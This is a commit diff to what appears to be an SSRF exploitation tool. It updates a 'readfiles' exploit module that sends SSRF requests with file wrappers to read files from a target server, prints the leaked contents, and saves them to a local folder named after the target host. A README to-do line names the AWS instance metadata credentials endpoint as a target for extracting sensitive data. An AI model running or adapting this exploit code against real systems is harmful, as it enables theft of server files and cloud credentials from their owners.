MODULE - readfile : keep a backup of the files
parent
baac471a09
commit
08333dfd01
|
@ -71,7 +71,6 @@ I <3 pull requests :)
|
||||||
Feel free to add any feature listed below or a new service.
|
Feel free to add any feature listed below or a new service.
|
||||||
|
|
||||||
- aws and other cloud providers - extract sensitive data from http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy and more
|
- aws and other cloud providers - extract sensitive data from http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy and more
|
||||||
- sockserver - SSRF SOCK proxy server - https://github.com/iamultra/ssrfsocks
|
|
||||||
- handle request with file in requester
|
- handle request with file in requester
|
||||||
- requester injection point in file (if param = None, check SSRFMAP in reqFile and replace with the payload)
|
- requester injection point in file (if param = None, check SSRFMAP in reqFile and replace with the payload)
|
||||||
- add https://github.com/cujanovic/SSRF-Testing ip.py into the ip generator from core.utils
|
- add https://github.com/cujanovic/SSRF-Testing ip.py into the ip generator from core.utils
|
||||||
|
|
|
@ -1,5 +1,6 @@
|
||||||
from core.utils import *
|
from core.utils import *
|
||||||
import logging
|
import logging
|
||||||
|
import os
|
||||||
|
|
||||||
name = "readfiles"
|
name = "readfiles"
|
||||||
description = "Read files from the target"
|
description = "Read files from the target"
|
||||||
|
@ -16,10 +17,22 @@ class exploit():
|
||||||
if r != None:
|
if r != None:
|
||||||
default = r.text
|
default = r.text
|
||||||
|
|
||||||
|
# Create directory to store files
|
||||||
|
directory = requester.host
|
||||||
|
if not os.path.exists(directory):
|
||||||
|
os.makedirs(directory)
|
||||||
|
|
||||||
for f in self.files:
|
for f in self.files:
|
||||||
r = requester.do_request(args.param, wrapper_file(f))
|
r = requester.do_request(args.param, wrapper_file(f))
|
||||||
logging.info("\033[32mReading file\033[0m : {}".format(f))
|
|
||||||
|
|
||||||
# Display diff between default and ssrf request
|
|
||||||
diff = diff_text(r.text, default)
|
diff = diff_text(r.text, default)
|
||||||
print(diff)
|
if diff != "":
|
||||||
|
|
||||||
|
# Display diff between default and ssrf request
|
||||||
|
logging.info("\033[32mReading file\033[0m : {}".format(f))
|
||||||
|
print(diff)
|
||||||
|
|
||||||
|
# Write diff to a file
|
||||||
|
filename = f.replace('\\','_').replace('/','_')
|
||||||
|
logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
|
||||||
|
with open(directory + "/" + filename, 'w') as f:
|
||||||
|
f.write(diff)
|
||||||
|
|
Loading…
Reference in New Issue